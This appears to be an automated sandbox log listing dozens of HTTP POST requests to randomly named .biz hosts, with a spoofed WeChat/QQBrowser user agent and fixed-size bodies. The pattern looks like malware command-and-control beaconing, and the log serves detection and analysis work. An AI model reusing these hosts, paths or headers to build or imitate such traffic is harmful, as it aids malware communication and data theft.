Source: global traffic	HTTP traffic detected: POST /xqpxqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fnppu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /llrqvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hegy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hwyhtns HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pjkmdseqxhhvplr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gjsue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /toabwtjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ojwsrlrloa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wtojknw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /haroldungxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bbqlwawxhwkmtrfc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /am HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xahrrvaf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rfuetphopheyd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bvynwxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xxyycbpqqgrofbr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gmkfkxvhjjwggemm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fumyjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hubil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bulntsganndw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ckivxpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ltyaxjqvibv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dgltjhlriyylmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /leqoagwnoid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /aiql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yqqmngrjnxvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /exygmnocmwksy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vbohqiwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yjcuxjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rwfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /levm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /opxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /aldycdkjcqrlqwgv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kuspgbuc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ixcw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yvoikxldsfcfgso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ugrdtwtacn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /exeqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dknfakeq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mmqkhapthxjsnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ndtogcedgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hkulo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sdsuahsrg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /otgkntfmpmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /umcybsxuaomkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ilidqggw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /digagk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iiuonvofxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nroqcaxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nuoraorjkrhft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /krrofgdqsat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /smeisoexdoewo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhsygfwinibyek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /tdfnnvngg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ydwthbku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jmryxuilbmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
